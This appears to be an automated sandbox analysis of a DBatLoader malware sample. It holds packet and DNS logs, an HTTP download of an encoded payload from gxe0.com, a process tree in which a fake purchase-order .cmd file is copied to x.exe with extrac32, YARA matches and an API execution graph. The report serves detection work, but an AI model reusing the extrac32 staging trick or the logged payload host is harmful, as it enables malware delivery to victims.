                        Dec 31, 2024 09:44:15.665160894 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:15.665183067 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:15.665225983 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:15.665234089 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:15.665247917 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:15.665793896 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:15.665807962 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:15.665847063 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:15.665854931 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:15.665878057 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:15.666301966 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:15.666326046 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:15.666367054 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:15.666373968 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:15.666431904 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:15.666465044 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:15.666479111 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:15.666482925 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:15.666498899 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:15.666516066 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:15.666542053 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:15.727982998 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:15.727982998 CET49707443192.168.2.8198.252.105.91
                        Dec 31, 2024 09:44:15.728008032 CET44349707198.252.105.91192.168.2.8
                        Dec 31, 2024 09:44:15.728018999 CET44349707198.252.105.91192.168.2.8
                        TimestampSource PortDest PortSource IPDest IP
                        Dec 31, 2024 09:44:11.704595089 CET5500353192.168.2.81.1.1.1
                        Dec 31, 2024 09:44:12.707782030 CET5500353192.168.2.81.1.1.1
                        Dec 31, 2024 09:44:12.996787071 CET53550031.1.1.1192.168.2.8
                        Dec 31, 2024 09:44:12.996798992 CET53550031.1.1.1192.168.2.8
                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                        Dec 31, 2024 09:44:11.704595089 CET192.168.2.81.1.1.10xec15Standard query (0)gxe0.comA (IP address)IN (0x0001)false
                        Dec 31, 2024 09:44:12.707782030 CET192.168.2.81.1.1.10xec15Standard query (0)gxe0.comA (IP address)IN (0x0001)false
                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Dec 31, 2024 09:44:12.996787071 CET1.1.1.1192.168.2.80xec15No error (0)gxe0.com198.252.105.91A (IP address)IN (0x0001)false
                        Dec 31, 2024 09:44:12.996798992 CET1.1.1.1192.168.2.80xec15No error (0)gxe0.com198.252.105.91A (IP address)IN (0x0001)false
                        • gxe0.com
                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.849707198.252.105.914437588C:\Users\user\AppData\Local\Temp\x.exe
                        TimestampBytes transferredDirectionData
                        2024-12-31 08:44:13 UTC162OUTGET /yak2/228_Dlwloedmcwb HTTP/1.1
                        Connection: Keep-Alive
                        Accept: */*
                        User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                        Host: gxe0.com
                        2024-12-31 08:44:14 UTC365INHTTP/1.1 200 OK
                        Connection: close
                        last-modified: Fri, 13 Dec 2024 10:33:51 GMT
                        accept-ranges: bytes
                        content-length: 2253516
                        date: Tue, 31 Dec 2024 08:44:13 GMT
                        server: LiteSpeed
                        alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                        2024-12-31 08:44:14 UTC1003INData Raw: 6f 61 6d 67 56 42 36 69 72 45 59 64 47 41 6f 63 47 52 41 4f 43 68 38 55 49 68 6f 50 47 42 6b 4d 46 42 55 65 46 52 4d 66 49 51 77 62 49 67 38 52 46 43 41 4d 49 52 51 52 46 52 67 61 45 52 45 56 43 52 59 58 49 42 34 64 49 67 77 64 46 68 77 56 45 77 38 4a 48 68 34 66 45 67 34 61 45 79 41 51 47 52 4d 68 44 52 51 66 44 78 55 64 48 68 67 64 43 52 34 56 43 77 34 56 48 78 63 55 47 52 41 63 45 68 41 57 45 71 47 70 6f 46 51 65 6f 71 78 47 53 68 51 66 46 42 63 4e 44 42 55 4c 48 77 71 68 71 61 42 55 48 71 4b 73 52 74 58 53 77 4e 62 52 75 73 54 41 30 37 37 49 30 4d 50 53 30 63 61 2b 76 64 53 39 74 39 50 4a 78 73 2f 49 77 37 6d 2b 79 73 62 4a 76 72 6d 39 30 74 43 35 75 62 33 42 76 4c 76 4b 31 4e 58 49 78 74 57 38 31 72 32 33 77 38 48 55 31 4e 4f 34 78 4e 43 33 79 72 72
                        Data Ascii: oamgVB6irEYdGAocGRAOCh8UIhoPGBkMFBUeFRMfIQwbIg8RFCAMIRQRFRgaEREVCRYXIB4dIgwdFhwVEw8JHh4fEg4aEyAQGRMhDRQfDxUdHhgdCR4VCw4VHxcUGRAcEhAWEqGpoFQeoqxGShQfFBcNDBULHwqhqaBUHqKsRtXSwNbRusTA077I0MPS0ca+vdS9t9PJxs/Iw7m+ysbJvrm90tC5ub3BvLvK1NXIxtW81r23w8HU1NO4xNC3yrr
                        2024-12-31 08:44:14 UTC14994INData Raw: 55 30 74 58 42 31 4c 32 2f 78 4c 33 54 75 37 37 52 75 74 61 34 75 72 79 34 31 64 4c 41 31 74 47 36 78 4d 44 54 76 73 6a 51 77 39 4c 52 78 72 36 39 31 4c 32 33 30 38 6e 47 7a 38 6a 44 75 62 37 4b 78 73 6d 2b 75 62 33 53 30 4c 6d 35 76 63 47 38 75 38 72 55 31 63 6a 47 31 62 7a 57 76 62 66 44 77 64 54 55 30 37 6a 45 30 4c 66 4b 75 74 47 33 79 63 57 2b 30 38 4f 39 31 64 54 53 31 63 48 55 76 62 2f 45 76 64 4f 37 76 74 47 36 31 72 69 36 76 4c 6a 56 30 73 44 57 30 62 72 45 77 4e 4f 2b 79 4e 44 44 30 74 48 47 76 72 33 55 76 62 66 54 79 63 62 50 79 4d 4f 35 76 73 72 47 79 62 36 35 76 64 4c 51 75 62 6d 39 77 62 79 37 79 74 54 56 79 4d 62 56 76 4e 61 39 74 38 50 42 31 4e 54 54 75 4d 54 51 74 38 71 36 30 62 66 4a 78 62 37 54 77 37 33 56 31 4e 4c 56 77 59 63 36 57 67
                        Data Ascii: U0tXB1L2/xL3Tu77Ruta4ury41dLA1tG6xMDTvsjQw9LRxr691L2308nGz8jDub7Kxsm+ub3S0Lm5vcG8u8rU1cjG1bzWvbfDwdTU07jE0LfKutG3ycW+08O91dTS1cHUvb/EvdO7vtG61ri6vLjV0sDW0brEwNO+yNDD0tHGvr3UvbfTycbPyMO5vsrGyb65vdLQubm9wby7ytTVyMbVvNa9t8PB1NTTuMTQt8q60bfJxb7Tw73V1NLVwYc6Wg
                        2024-12-31 08:44:14 UTC16384INData Raw: 4e 62 52 75 73 54 41 30 37 37 49 30 4d 50 53 30 63 61 2b 76 64 53 39 74 39 50 4a 78 73 2f 49 77 37 6d 2b 79 73 62 4a 76 72 6d 39 30 74 43 35 75 62 33 42 76 4c 76 4b 31 4e 58 49 78 74 57 38 31 72 32 33 77 38 48 55 31 4e 4f 34 78 4e 43 33 79 72 72 52 74 38 6e 46 76 74 50 44 76 64 58 55 30 74 58 42 31 4c 32 2f 78 4c 33 54 75 37 37 52 75 74 61 34 75 72 79 34 31 64 4c 41 31 74 47 36 78 4d 44 54 76 73 6a 51 77 39 4c 52 78 72 36 39 31 4c 32 33 30 38 6e 47 7a 38 6a 44 75 62 37 4b 78 73 6d 2b 75 62 33 53 30 4c 6d 35 76 63 47 38 75 38 72 55 31 63 6a 47 31 62 7a 57 76 62 66 44 77 64 54 55 30 37 6a 45 30 4c 66 4b 75 74 47 33 79 63 57 2b 30 38 4f 39 31 64 54 53 31 63 48 55 76 62 2f 45 76 64 4f 37 76 74 47 36 31 72 69 36 76 4c 6a 56 30 73 44 57 30 62 72 45 77 4e 4f 2b
                        Data Ascii: NbRusTA077I0MPS0ca+vdS9t9PJxs/Iw7m+ysbJvrm90tC5ub3BvLvK1NXIxtW81r23w8HU1NO4xNC3yrrRt8nFvtPDvdXU0tXB1L2/xL3Tu77Ruta4ury41dLA1tG6xMDTvsjQw9LRxr691L2308nGz8jDub7Kxsm+ub3S0Lm5vcG8u8rU1cjG1bzWvbfDwdTU07jE0LfKutG3ycW+08O91dTS1cHUvb/EvdO7vtG61ri6vLjV0sDW0brEwNO+
                        2024-12-31 08:44:14 UTC16384INData Raw: 64 54 55 30 37 6a 45 30 4c 66 4b 75 74 47 33 79 63 57 2b 30 38 4f 39 31 64 54 53 31 63 48 55 76 62 2f 45 76 64 4f 37 76 74 47 36 31 72 69 36 76 4c 6a 56 30 73 44 57 30 62 72 45 77 4e 4f 2b 79 4e 44 44 30 74 48 47 76 72 33 55 76 62 66 54 79 63 62 50 79 4d 4f 35 76 73 72 47 79 62 36 35 76 64 4c 51 75 62 6d 39 77 62 79 37 79 74 54 56 79 4d 62 56 76 4e 61 39 74 38 50 42 31 4e 54 54 75 4d 54 51 74 38 71 36 30 62 66 4a 78 62 37 54 77 37 33 56 31 4e 4c 56 77 64 53 39 76 38 53 39 30 37 75 2b 30 62 72 57 75 4c 71 38 75 4e 58 53 77 4e 62 52 75 73 54 41 30 37 37 49 30 4d 50 53 30 63 61 2b 76 64 53 39 74 39 50 4a 78 73 2f 49 77 37 6d 2b 79 73 62 4a 76 72 6d 39 30 74 43 35 75 62 33 42 76 4c 76 4b 31 4e 58 49 78 74 57 38 31 72 32 33 77 38 48 55 31 4e 4f 34 78 4e 43 33
                        Data Ascii: dTU07jE0LfKutG3ycW+08O91dTS1cHUvb/EvdO7vtG61ri6vLjV0sDW0brEwNO+yNDD0tHGvr3UvbfTycbPyMO5vsrGyb65vdLQubm9wby7ytTVyMbVvNa9t8PB1NTTuMTQt8q60bfJxb7Tw73V1NLVwdS9v8S907u+0brWuLq8uNXSwNbRusTA077I0MPS0ca+vdS9t9PJxs/Iw7m+ysbJvrm90tC5ub3BvLvK1NXIxtW81r23w8HU1NO4xNC3
                        2024-12-31 08:44:14 UTC16384INData Raw: 63 61 2b 76 64 53 39 74 39 50 4a 78 73 2f 49 77 37 6d 2b 79 73 62 4a 76 72 6d 39 30 74 43 35 75 62 33 42 76 4c 76 4b 31 4e 58 49 78 74 57 38 31 72 32 33 77 38 48 55 31 4e 4f 34 78 4e 43 33 79 72 72 52 74 38 6e 46 76 74 50 44 76 64 58 55 30 74 58 42 31 4c 32 2f 78 4c 33 54 75 37 37 52 75 74 61 34 75 72 79 34 31 64 4c 41 31 74 47 36 78 4d 44 54 76 73 6a 51 77 39 4c 52 78 72 36 39 31 4c 32 33 30 38 6e 47 7a 38 6a 44 75 62 37 4b 78 73 6d 2b 75 62 33 53 30 4c 6d 35 76 63 47 38 75 38 72 55 31 63 6a 47 31 62 7a 57 76 62 66 44 77 64 54 55 30 37 6a 45 30 4c 66 4b 75 74 47 33 79 63 57 2b 30 38 4f 39 31 64 54 53 31 63 48 55 76 62 2f 45 76 64 4f 37 76 74 47 36 31 72 69 36 76 4c 6a 56 30 73 44 57 30 62 72 45 77 4e 4f 2b 79 4e 44 44 30 74 48 47 76 72 33 55 76 62 66 54
                        Data Ascii: ca+vdS9t9PJxs/Iw7m+ysbJvrm90tC5ub3BvLvK1NXIxtW81r23w8HU1NO4xNC3yrrRt8nFvtPDvdXU0tXB1L2/xL3Tu77Ruta4ury41dLA1tG6xMDTvsjQw9LRxr691L2308nGz8jDub7Kxsm+ub3S0Lm5vcG8u8rU1cjG1bzWvbfDwdTU07jE0LfKutG3ycW+08O91dTS1cHUvb/EvdO7vtG61ri6vLjV0sDW0brEwNO+yNDD0tHGvr3UvbfT
                        2024-12-31 08:44:14 UTC16384INData Raw: 63 57 2b 30 38 4f 39 31 64 54 53 31 63 48 55 76 62 2f 45 76 64 4f 37 76 74 47 36 31 72 69 36 76 4c 6a 56 30 73 44 57 30 62 72 45 77 4e 4f 2b 79 4e 44 44 30 74 48 47 76 72 33 55 76 62 66 54 79 63 62 50 79 4d 4f 35 76 73 72 47 79 62 36 35 76 64 4c 51 75 62 6d 39 77 62 79 37 79 74 54 56 79 4d 62 56 76 4e 61 39 74 38 50 42 31 4e 54 54 75 4d 54 51 74 38 71 36 30 62 66 4a 78 62 37 54 77 37 33 56 31 4e 4c 56 77 64 53 39 76 38 53 39 30 37 75 2b 30 62 72 57 75 4c 71 38 75 4e 58 53 77 4e 62 52 75 73 54 41 30 37 37 49 30 4d 50 53 30 63 61 2b 76 64 53 39 74 39 50 4a 78 73 2f 49 77 37 6d 2b 79 73 62 4a 76 72 6d 39 30 74 43 35 75 62 33 42 76 4c 76 4b 31 4e 58 49 78 74 57 38 31 72 32 33 77 38 48 55 31 4e 4f 34 78 4e 43 33 79 72 72 52 74 38 6e 46 76 74 50 44 76 64 58 55
                        Data Ascii: cW+08O91dTS1cHUvb/EvdO7vtG61ri6vLjV0sDW0brEwNO+yNDD0tHGvr3UvbfTycbPyMO5vsrGyb65vdLQubm9wby7ytTVyMbVvNa9t8PB1NTTuMTQt8q60bfJxb7Tw73V1NLVwdS9v8S907u+0brWuLq8uNXSwNbRusTA077I0MPS0ca+vdS9t9PJxs/Iw7m+ysbJvrm90tC5ub3BvLvK1NXIxtW81r23w8HU1NO4xNC3yrrRt8nFvtPDvdXU
                        2024-12-31 08:44:14 UTC16384INData Raw: 37 6d 2b 79 73 62 4a 76 72 6d 39 30 74 43 35 75 62 33 42 76 4c 76 4b 31 4e 58 49 78 74 57 38 31 72 32 33 77 38 48 55 31 4e 4f 34 78 4e 43 33 79 72 72 52 74 38 6e 46 76 74 50 44 76 64 58 55 30 74 58 42 31 4c 32 2f 78 4c 33 54 75 37 37 52 75 74 61 34 75 72 79 34 31 64 4c 41 31 74 47 36 78 4d 44 54 76 73 6a 51 77 39 4c 52 78 72 36 39 31 4c 32 33 30 38 6e 47 7a 38 6a 44 75 62 37 4b 78 73 6d 2b 75 62 33 53 30 4c 6d 35 76 63 47 38 75 38 72 55 31 63 6a 47 31 62 7a 57 76 62 66 44 77 64 54 55 30 37 6a 45 30 4c 66 4b 75 74 47 33 79 63 57 2b 30 38 4f 39 31 64 54 53 31 63 48 55 76 62 2f 45 76 64 4f 37 76 74 47 36 31 72 69 36 76 4c 6a 56 30 73 44 57 30 62 72 45 77 4e 4f 2b 79 4e 44 44 30 74 48 47 76 72 33 55 76 62 66 54 79 63 62 50 79 4d 4f 35 76 73 72 47 79 62 36 35
                        Data Ascii: 7m+ysbJvrm90tC5ub3BvLvK1NXIxtW81r23w8HU1NO4xNC3yrrRt8nFvtPDvdXU0tXB1L2/xL3Tu77Ruta4ury41dLA1tG6xMDTvsjQw9LRxr691L2308nGz8jDub7Kxsm+ub3S0Lm5vcG8u8rU1cjG1bzWvbfDwdTU07jE0LfKutG3ycW+08O91dTS1cHUvb/EvdO7vtG61ri6vLjV0sDW0brEwNO+yNDD0tHGvr3UvbfTycbPyMO5vsrGyb65
                        2024-12-31 08:44:14 UTC16384INData Raw: 62 2f 45 76 64 4f 37 76 74 47 36 31 72 69 36 76 4c 6a 56 30 73 44 57 30 62 72 45 77 4e 4f 2b 79 4e 44 44 30 74 48 47 76 72 33 55 76 62 66 54 79 63 62 50 79 4d 4f 35 76 73 72 47 79 62 36 35 76 64 4c 51 75 62 6d 39 77 62 79 37 79 74 54 56 79 4d 62 56 76 4e 61 39 74 38 50 42 31 4e 54 54 75 4d 54 51 74 38 71 36 30 62 66 4a 78 62 37 54 77 37 33 56 31 4e 4c 56 77 64 53 39 76 38 53 39 30 37 75 2b 30 62 72 57 75 4c 71 38 75 4e 58 53 77 4e 62 52 75 73 54 41 30 37 37 49 30 4d 50 53 30 63 61 2b 76 64 53 39 74 39 50 4a 78 73 2f 49 77 37 6d 2b 79 73 62 4a 76 72 6d 39 30 74 43 35 75 62 33 42 76 4c 76 4b 31 4e 58 49 78 74 57 38 31 72 32 33 77 38 48 55 31 4e 4f 34 78 4e 43 33 79 72 72 52 74 38 6e 46 76 74 50 44 76 64 58 55 30 74 58 42 31 4c 32 2f 78 4c 33 54 75 37 37 52
                        Data Ascii: b/EvdO7vtG61ri6vLjV0sDW0brEwNO+yNDD0tHGvr3UvbfTycbPyMO5vsrGyb65vdLQubm9wby7ytTVyMbVvNa9t8PB1NTTuMTQt8q60bfJxb7Tw73V1NLVwdS9v8S907u+0brWuLq8uNXSwNbRusTA077I0MPS0ca+vdS9t9PJxs/Iw7m+ysbJvrm90tC5ub3BvLvK1NXIxtW81r23w8HU1NO4xNC3yrrRt8nFvtPDvdXU0tXB1L2/xL3Tu77R
                        2024-12-31 08:44:14 UTC16384INData Raw: 62 33 42 76 4c 76 4b 31 4e 58 49 78 74 57 38 31 72 32 33 77 38 48 55 31 4e 4f 34 78 4e 43 33 79 72 72 52 74 38 6e 46 76 74 50 44 76 64 58 55 30 74 58 42 31 4c 32 2f 78 4c 33 54 75 37 37 52 75 74 61 34 75 72 79 34 31 64 4c 41 31 74 47 36 78 4d 44 54 76 73 6a 51 77 39 4c 52 78 72 36 39 31 4c 32 33 30 38 6e 47 7a 38 6a 44 75 62 37 4b 78 73 6d 2b 75 62 33 53 30 4c 6d 35 76 63 47 38 75 38 72 55 31 63 6a 47 31 62 7a 57 76 62 66 44 77 64 54 55 30 37 6a 45 30 4c 66 4b 75 74 47 33 79 63 57 2b 30 38 4f 39 31 64 54 53 31 63 48 55 76 62 2f 45 76 64 4f 37 76 74 47 36 31 72 69 36 76 4c 6a 56 30 73 44 57 30 62 72 45 77 4e 4f 2b 79 4e 44 44 30 74 48 47 76 72 33 55 76 62 66 54 79 63 62 50 79 4d 4f 35 76 73 72 47 79 62 36 35 76 64 4c 51 75 62 6d 39 77 62 79 37 79 74 54 56
                        Data Ascii: b3BvLvK1NXIxtW81r23w8HU1NO4xNC3yrrRt8nFvtPDvdXU0tXB1L2/xL3Tu77Ruta4ury41dLA1tG6xMDTvsjQw9LRxr691L2308nGz8jDub7Kxsm+ub3S0Lm5vcG8u8rU1cjG1bzWvbfDwdTU07jE0LfKutG3ycW+08O91dTS1cHUvb/EvdO7vtG61ri6vLjV0sDW0brEwNO+yNDD0tHGvr3UvbfTycbPyMO5vsrGyb65vdLQubm9wby7ytTV
                        2024-12-31 08:44:14 UTC16384INData Raw: 4c 6a 56 30 73 44 57 30 62 72 45 77 4e 4f 2b 79 4e 44 44 30 74 48 47 76 72 33 55 76 62 66 54 79 63 62 50 79 4d 4f 35 76 73 72 47 79 62 36 35 76 64 4c 51 75 62 6d 39 77 62 79 37 79 74 54 56 79 4d 62 56 76 4e 61 39 74 38 50 42 31 4e 54 54 75 4d 54 51 74 38 71 36 30 62 66 4a 78 62 37 54 77 37 33 56 31 4e 4c 56 77 64 53 39 76 38 53 39 30 37 75 2b 30 62 72 57 75 4c 71 38 75 4e 58 53 77 4e 62 52 75 73 54 41 30 37 37 49 30 4d 50 53 30 63 61 2b 76 64 53 39 74 39 50 4a 78 73 2f 49 77 37 6d 2b 79 73 62 4a 76 72 6d 39 30 74 43 35 75 62 33 42 76 4c 76 4b 31 4e 58 49 78 74 57 38 31 72 32 33 77 38 48 55 31 4e 4f 34 78 4e 43 33 79 72 72 52 74 38 6e 46 76 74 50 44 76 64 58 55 30 74 58 42 31 4c 32 2f 78 4c 33 54 75 37 37 52 75 74 61 34 75 72 79 34 31 64 4c 41 31 74 47 36
                        Data Ascii: LjV0sDW0brEwNO+yNDD0tHGvr3UvbfTycbPyMO5vsrGyb65vdLQubm9wby7ytTVyMbVvNa9t8PB1NTTuMTQt8q60bfJxb7Tw73V1NLVwdS9v8S907u+0brWuLq8uNXSwNbRusTA077I0MPS0ca+vdS9t9PJxs/Iw7m+ysbJvrm90tC5ub3BvLvK1NXIxtW81r23w8HU1NO4xNC3yrrRt8nFvtPDvdXU0tXB1L2/xL3Tu77Ruta4ury41dLA1tG6


                        Click to jump to process

                        Click to jump to process

                        Click to dive into process behavior distribution

                        Click to jump to process

                        Target ID:0
                        Start time:03:44:08
                        Start date:31/12/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\PO#5_tower_Dec162024.cmd" "
                        Imagebase:0x7ff7ed350000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:2
                        Start time:03:44:08
                        Start date:31/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6ee680000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:3
                        Start time:03:44:09
                        Start date:31/12/2024
                        Path:C:\Windows\System32\extrac32.exe
                        Wow64 process (32bit):false
                        Commandline:extrac32 /y "C:\Users\user\Desktop\PO#5_tower_Dec162024.cmd" "C:\Users\user\AppData\Local\Temp\x.exe"
                        Imagebase:0x7ff6a9210000
                        File size:35'328 bytes
                        MD5 hash:41330D97BF17D07CD4308264F3032547
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate
                        Has exited:true

                        Target ID:4
                        Start time:03:44:09
                        Start date:31/12/2024
                        Path:C:\Users\user\AppData\Local\Temp\x.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\AppData\Local\Temp\x.exe"
                        Imagebase:0x400000
                        File size:953'856 bytes
                        MD5 hash:6C1C692B2DE02C5CE02A5D2D27117851
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:Borland Delphi
                        Yara matches:
                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000004.00000003.1592457768.000000007F700000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000004.00000002.1593974341.00000000022C7000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000004.00000003.1414129618.000000007FBA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000004.00000003.1413414951.000000007FD80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000004.00000000.1411291204.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\x.exe, Author: Joe Security
                        Antivirus matches:
                        • Detection: 50%, ReversingLabs
                        Reputation:low
                        Has exited:true

                        Target ID:8
                        Start time:03:44:16
                        Start date:31/12/2024
                        Path:C:\Windows\SysWOW64\WerFault.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7588 -s 2168
                        Imagebase:0xf60000
                        File size:483'680 bytes
                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Reset < >

                          Execution Graph

                          Execution Coverage:7.3%
                          Dynamic/Decrypted Code Coverage:100%
                          Signature Coverage:16.2%
                          Total number of Nodes:241
                          Total number of Limit Nodes:10
                          execution_graph 25312 2b81c6c 25313 2b81c7c 25312->25313 25314 2b81d04 25312->25314 25315 2b81c89 25313->25315 25316 2b81cc0 25313->25316 25317 2b81f58 25314->25317 25318 2b81d0d 25314->25318 25319 2b81c94 25315->25319 25360 2b81724 25315->25360 25323 2b81724 10 API calls 25316->25323 25320 2b81fec 25317->25320 25326 2b81f68 25317->25326 25327 2b81fac 25317->25327 25321 2b81e24 25318->25321 25322 2b81d25 25318->25322 25339 2b81e7c 25321->25339 25340 2b81e55 Sleep 25321->25340 25344 2b81e95 25321->25344 25328 2b81d2c 25322->25328 25333 2b81d48 25322->25333 25334 2b81dfc 25322->25334 25324 2b81cd7 25323->25324 25348 2b81a8c 8 API calls 25324->25348 25351 2b81cfd 25324->25351 25330 2b81724 10 API calls 25326->25330 25329 2b81fb2 25327->25329 25332 2b81724 10 API calls 25327->25332 25352 2b81f82 25330->25352 25331 2b81724 10 API calls 25346 2b81f2c 25331->25346 25349 2b81fc1 25332->25349 25335 2b81d79 Sleep 25333->25335 25342 2b81d9c 25333->25342 25337 2b81724 10 API calls 25334->25337 25341 2b81d91 Sleep 25335->25341 25335->25342 25336 2b81ca1 25350 2b81cb9 25336->25350 25384 2b81a8c 25336->25384 25354 2b81e05 25337->25354 25338 2b81fa7 25339->25331 25339->25344 25340->25339 25343 2b81e6f Sleep 25340->25343 25341->25333 25343->25321 25346->25344 25353 2b81a8c 8 API calls 25346->25353 25347 2b81e1d 25348->25351 25349->25338 25356 2b81a8c 8 API calls 25349->25356 25352->25338 25355 2b81a8c 8 API calls 25352->25355 25357 2b81f50 25353->25357 25354->25347 25358 2b81a8c 8 API calls 25354->25358 25355->25338 25359 2b81fe4 25356->25359 25358->25347 25361 2b81968 25360->25361 25362 2b8173c 25360->25362 25363 2b81a80 25361->25363 25364 2b81938 25361->25364 25372 2b817cb Sleep 25362->25372 25374 2b8174e 25362->25374 25365 2b81a89 25363->25365 25366 2b81684 VirtualAlloc 25363->25366 25368 2b81947 Sleep 25364->25368 25377 2b81986 25364->25377 25365->25336 25369 2b816bf 25366->25369 25370 2b816af 25366->25370 25367 2b8175d 25367->25336 25371 2b8195d Sleep 25368->25371 25368->25377 25369->25336 25401 2b81644 25370->25401 25371->25364 25372->25374 25376 2b817e4 Sleep 25372->25376 25374->25367 25375 2b8182c 25374->25375 25378 2b8180a Sleep 25374->25378 25383 2b81838 25375->25383 25407 2b815cc 25375->25407 25376->25362 25379 2b815cc VirtualAlloc 25377->25379 25381 2b819a4 25377->25381 25378->25375 25380 2b81820 Sleep 25378->25380 25379->25381 25380->25374 25381->25336 25383->25336 25385 2b81b6c 25384->25385 25386 2b81aa1 25384->25386 25387 2b816e8 25385->25387 25388 2b81aa7 25385->25388 25386->25388 25392 2b81b13 Sleep 25386->25392 25391 2b81c66 25387->25391 25394 2b81644 2 API calls 25387->25394 25389 2b81b81 25388->25389 25390 2b81ab0 25388->25390 25395 2b81b4b Sleep 25388->25395 25399 2b81c00 VirtualFree 25389->25399 25400 2b81ba4 25389->25400 25390->25350 25391->25350 25392->25388 25393 2b81b2d Sleep 25392->25393 25393->25386 25396 2b816f5 VirtualFree 25394->25396 25395->25389 25397 2b81b61 Sleep 25395->25397 25398 2b8170d 25396->25398 25397->25388 25398->25350 25399->25350 25400->25350 25402 2b8164d 25401->25402 25403 2b81681 25401->25403 25402->25403 25404 2b8164f Sleep 25402->25404 25403->25369 25405 2b81664 25404->25405 25405->25403 25406 2b81668 Sleep 25405->25406 25406->25402 25411 2b81560 25407->25411 25409 2b815d4 VirtualAlloc 25410 2b815eb 25409->25410 25410->25383 25412 2b81500 25411->25412 25412->25409 25413 2bac2fc 25423 2b86518 25413->25423 25417 2bac32a 25428 2babb50 timeSetEvent 25417->25428 25419 2bac334 25420 2bac342 GetMessageA 25419->25420 25421 2bac352 25420->25421 25422 2bac336 TranslateMessage DispatchMessageA 25420->25422 25422->25420 25424 2b86523 25423->25424 25429 2b84168 25424->25429 25427 2b8427c SysAllocStringLen SysFreeString SysReAllocStringLen 25427->25417 25428->25419 25430 2b841ae 25429->25430 25431 2b843b8 25430->25431 25432 2b84227 25430->25432 25435 2b843e9 25431->25435 25438 2b843fa 25431->25438 25443 2b84100 25432->25443 25448 2b8432c GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 25435->25448 25437 2b843f3 25437->25438 25439 2b8443f FreeLibrary 25438->25439 25440 2b84463 25438->25440 25439->25438 25441 2b8446c 25440->25441 25442 2b84472 ExitProcess 25440->25442 25441->25442 25444 2b84143 25443->25444 25445 2b84110 25443->25445 25444->25427 25445->25444 25446 2b815cc VirtualAlloc 25445->25446 25449 2b85814 25445->25449 25446->25445 25448->25437 25450 2b85824 GetModuleFileNameA 25449->25450 25452 2b85840 25449->25452 25453 2b85a78 GetModuleFileNameA RegOpenKeyExA 25450->25453 25452->25445 25454 2b85afb 25453->25454 25455 2b85abb RegOpenKeyExA 25453->25455 25471 2b858b4 12 API calls 25454->25471 25455->25454 25456 2b85ad9 RegOpenKeyExA 25455->25456 25456->25454 25458 2b85b84 lstrcpynA GetThreadLocale GetLocaleInfoA 25456->25458 25460 2b85c9e 25458->25460 25465 2b85bbb 25458->25465 25459 2b85b20 